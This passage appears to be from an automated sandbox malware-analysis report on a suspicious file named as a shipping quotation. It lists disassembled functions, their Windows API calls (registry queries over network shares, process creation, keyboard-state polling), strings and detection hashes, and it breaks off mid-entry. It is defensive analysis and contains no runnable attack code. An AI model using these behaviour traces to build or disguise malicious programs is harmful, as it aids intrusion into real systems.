                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 52b9ef77c6a7912995ef54ab915c9f069bdf8da90ab43049cd887df4d530175f
                                                                            • Instruction ID: 9247609da9f9828876d85f25083b4ebad0723a3749f4f054049b252679725da1
                                                                            • Opcode Fuzzy Hash: 52b9ef77c6a7912995ef54ab915c9f069bdf8da90ab43049cd887df4d530175f
                                                                            • Instruction Fuzzy Hash: 974171311446449FDB209F3D9C84FBA37A7AB16330F284B55F9A6872E1D731D842DB21
                                                                            Function 0069365B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0069369C
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00693797
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0069380C
                                                                            • GetDlgCtrlID.USER32(?), ref: 0069385D
                                                                            • GetWindowRect.USER32(?,?), ref: 00693882
                                                                            • GetParent.USER32(?), ref: 006938A0
                                                                            • ScreenToClient.USER32(00000000), ref: 006938A7
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00693921
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0069395D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                            • String ID: %s%u
                                                                            • API String ID: 1412819556-679674701
                                                                            • Opcode ID: b763fc24f221051fdc67f9ce2c5c727d3957c0d0c8be0530c88cd5eacdf24f03
                                                                            • Instruction ID: af7dbc37ac92ce9c88e55bf610b8bc81c551643c84c06a1df0f1a8f69e361ec6
                                                                            • Opcode Fuzzy Hash: b763fc24f221051fdc67f9ce2c5c727d3957c0d0c8be0530c88cd5eacdf24f03
                                                                            • Instruction Fuzzy Hash: E991C271204616AFDB18DF64C885FEAB7AEFF44350F004519F99AC6790EB30EA45CB91
                                                                            Function 006996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0067F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00699717
                                                                            • LoadStringW.USER32(00000000,?,0067F7F8,00000001), ref: 00699720
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0067F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00699742
                                                                            • LoadStringW.USER32(00000000,?,0067F7F8,00000001), ref: 00699745
                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00699866
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 4072794657-2268648507
                                                                            • Opcode ID: b4a54cabfdf8e45c5410bb0bdb96607fb8b714c02e899cb1287da70a5b8ff4a6
                                                                            • Instruction ID: 24173556cfcc5fdc876dd6a615092e2cf17742871222ccb9bdcc76fa30d886c1
                                                                            • Opcode Fuzzy Hash: b4a54cabfdf8e45c5410bb0bdb96607fb8b714c02e899cb1287da70a5b8ff4a6
                                                                            • Instruction Fuzzy Hash: AF414B72800219AADF44EBE4CE46EEEB37AEF55300F10442DF60572192EA756F49CAB5
                                                                            Function 006906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006907A2
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006907BE
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006907DA
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00690804
                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0069082C
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00690837
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0069083C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 3030280669-22481851
                                                                            • Opcode ID: 0fb48669ce0c27d400a86a567dd646515b4b5934398e1961e77ca1b2f57d5da0
                                                                            • Instruction ID: ca2b5c342cd195c9a88fd0ffbcf68a1a1852f6066e9298fb678fc7da86fe2290
                                                                            • Opcode Fuzzy Hash: 0fb48669ce0c27d400a86a567dd646515b4b5934398e1961e77ca1b2f57d5da0
                                                                            • Instruction Fuzzy Hash: C3410672D10229AFDF15EBA4DC95DEDB77ABF44350F044129E906A72A1EB709E04CBA0
                                                                            Function 006A3D1E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006A3D40
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006A3D9D
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006A3DBE
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 006A3DCE
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006A3E55
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006A3E60
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006A3E6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 3827137101-3457252023
                                                                            • Opcode ID: 56865e80c5f88c91e82eebc1906b49dcd2679fd10f3f32aab8375f0dbf905c92
                                                                            • Instruction ID: 30930cd08b0803182375091c44baa84980c49b341f6468dcb3c6bff883c2ac3d
                                                                            • Opcode Fuzzy Hash: 56865e80c5f88c91e82eebc1906b49dcd2679fd10f3f32aab8375f0dbf905c92
                                                                            • Instruction Fuzzy Hash: 2C318372900119ABDB21AFA0DC49FEB37BEEF89750F1041A5F609D6260E7749B448F64
                                                                            Function 006C3F98 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006C403B
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 006C4042
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006C4055
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006C405D
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 006C4068
                                                                            • DeleteDC.GDI32(00000000), ref: 006C4072
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C407C
                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 006C4092
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 006C409E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: b8d7f206a1be5e026acb0581c530f66539fc1272ec7916fc7dea7ab05c2d932a
                                                                            • Instruction ID: da7827d9e307f982c36d120667d710cf6a03265f94414bf2d64aec65275926e5
                                                                            • Opcode Fuzzy Hash: b8d7f206a1be5e026acb0581c530f66539fc1272ec7916fc7dea7ab05c2d932a
                                                                            • Instruction Fuzzy Hash: 89316E32541215AFDF219FA4CC49FEA3BAAFF0D324F110219FA18E62A0CB75D811DB54
                                                                            Function 006BAFF9 Relevance: 16.9, APIs: 11, Instructions: 418processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006BB1B0
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006BB1D4
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006BB214
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006BB236
                                                                              • Part of subcall function 006A05A7: GetStdHandle.KERNEL32(000000F6), ref: 006A05C6
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006BB3B6
                                                                            • GetLastError.KERNEL32(00000000), ref: 006BB407
                                                                            • CloseHandle.KERNEL32(?), ref: 006BB439
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BB44A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BB45C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BB46E
                                                                            • CloseHandle.KERNEL32(?), ref: 006BB4E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Handle$Close$Directory$CurrentSystem$CreateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 3101636085-0
                                                                            • Opcode ID: 02e56263aeb543862062e6b4c31e0650e2f65de44df1d22cdcf1c8172b3967d8
                                                                            • Instruction ID: 061f358cf239928e3d222a195b4a8708563c6a3d05bf3b8eeb254e8ba8d97655
                                                                            • Opcode Fuzzy Hash: 02e56263aeb543862062e6b4c31e0650e2f65de44df1d22cdcf1c8172b3967d8
                                                                            • Instruction Fuzzy Hash: 38F1AF715043409FC764EF24C891BAEBBE2AF85314F14945DF8998B3A2CB71EC85CB96
                                                                            Function 006A7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 006A7AF3
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006A7B8F
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 006A7BA3
                                                                            • CoCreateInstance.OLE32(006CFD08,00000000,00000001,006F6E6C,?), ref: 006A7BEF
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006A7C74
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 006A7CCC
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 006A7D57
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006A7D7A
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006A7D81
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006A7DD6
                                                                            • CoUninitialize.OLE32 ref: 006A7DDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2762341140-0
                                                                            • Opcode ID: 872c5a6e113f1cd8d9890b04714798f36ac24fc1f8cf7edf610955ad2447b8eb
                                                                            • Instruction ID: 13d0a9dcf00ee6cf7f837721723d6bfd28fa714767c37ea539b6a9d5dfe3b589
                                                                            • Opcode Fuzzy Hash: 872c5a6e113f1cd8d9890b04714798f36ac24fc1f8cf7edf610955ad2447b8eb
                                                                            • Instruction Fuzzy Hash: AAC1F975A04109AFCB14EF64C884DAEBBFAFF49314B148499E91A9B361D730ED45CF90
                                                                            Function 006C541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006C5504
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006C5515
                                                                            • CharNextW.USER32(00000158), ref: 006C5544
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006C5585
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006C559B
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006C55AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID:
                                                                            • API String ID: 1350042424-0
                                                                            • Opcode ID: dd73d6731fe306b8b4dffd040d55f5552888606e26678c470a451f2bc2ef4d9f
                                                                            • Instruction ID: 869389b50d4b31a259262f2df1bc5d634d47d5bb3bd0636491df7e8c0fbb72d8
                                                                            • Opcode Fuzzy Hash: dd73d6731fe306b8b4dffd040d55f5552888606e26678c470a451f2bc2ef4d9f
                                                                            • Instruction Fuzzy Hash: 49619E30900608EFDF109F55CD84EFE7BBAEF09720F508149F926AA291D774AAC1DB60
                                                                            Function 0068FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0068FAAF
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0068FB08
                                                                            • VariantInit.OLEAUT32(?), ref: 0068FB1A
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0068FB3A
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0068FB8D
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0068FBA1
                                                                            • VariantClear.OLEAUT32(?), ref: 0068FBB6
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0068FBC3
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0068FBCC
                                                                            • VariantClear.OLEAUT32(?), ref: 0068FBDE
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0068FBE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: 65ae3575def0d162a88ab73e7b39bb49c1250ea545a4f426012634288aad16fa
                                                                            • Instruction ID: 8b98e514bdf25a97d41bff7474fdf00d1cccc891c2832a3c2a40394984b7dca9
                                                                            • Opcode Fuzzy Hash: 65ae3575def0d162a88ab73e7b39bb49c1250ea545a4f426012634288aad16fa
                                                                            • Instruction Fuzzy Hash: E5412E35A00219DFCB04EF64D854DAEBBBAFF48354F00C169E95AA7261DB30A946CF90
                                                                            Function 00699C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00699CA1
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00699D22
                                                                            • GetKeyState.USER32(000000A0), ref: 00699D3D
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00699D57
                                                                            • GetKeyState.USER32(000000A1), ref: 00699D6C
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00699D84
                                                                            • GetKeyState.USER32(00000011), ref: 00699D96
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00699DAE
                                                                            • GetKeyState.USER32(00000012), ref: 00699DC0
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00699DD8
                                                                            • GetKeyState.USER32(0000005B), ref: 00699DEA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 9848eed723c62b46e9448031dc30e05d3d966b9dab45f77ea63a203367427024
                                                                            • Instruction ID: c5d9c95824b1c90da0de24f2d68bfe571b89895d55df91045a8869fc0c409bd2
                                                                            • Opcode Fuzzy Hash: 9848eed723c62b46e9448031dc30e05d3d966b9dab45f77ea63a203367427024
                                                                            • Instruction Fuzzy Hash: 6C41F930504BC96DFF30876888443F5BEAA6F12354F44805EC6C656BC2EBA599C8C7B2
                                                                            Function 006930F7 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 400COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[o
                                                                            • API String ID: 0-1026763703
                                                                            • Opcode ID: 344194cb0d9dccbdb69b5814ea6fe6eb82534bcafc038ff787199e9d0b06880b
                                                                            • Instruction ID: 3fe491a939d8a75e103ab7588193c444ef2df525510a2f8e683ea0f41c846498
                                                                            • Opcode Fuzzy Hash: 344194cb0d9dccbdb69b5814ea6fe6eb82534bcafc038ff787199e9d0b06880b
                                                                            • Instruction Fuzzy Hash: EBE10232A00526ABCF189FA8C4516FEBBBBBF04710F558129E556A7740DB30AF859790
                                                                            Function 006A44C0 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 309COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(00000000,00000000,006CCC08), ref: 006A4527
                                                                            • GetDriveTypeW.KERNEL32(?,006F6BF0,00000061), ref: 006A4743
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2426244813-1000479233
                                                                            • Opcode ID: 428c16ba93097b92b73611dd568c91a6ac9e11c073ba5d3aea5b8656112e93f2
                                                                            • Instruction ID: e239cd2bd8e6e8da7971b1330c796af71a2f4c8f9aa3f87565acf65311f612a4
                                                                            • Opcode Fuzzy Hash: 428c16ba93097b92b73611dd568c91a6ac9e11c073ba5d3aea5b8656112e93f2
                                                                            • Instruction Fuzzy Hash: 7AB1C1716083029BC710EF28C891AAAB7E7AFE6764F50491DF496C7391DBB0DC45CA92
                                                                            Function 00694954 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00694994
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006949DA
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 006949F7
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00694A64
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00694A9D
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00694AE6
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00694B20
                                                                            • GetWindowRect.USER32(?,?), ref: 00694B8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
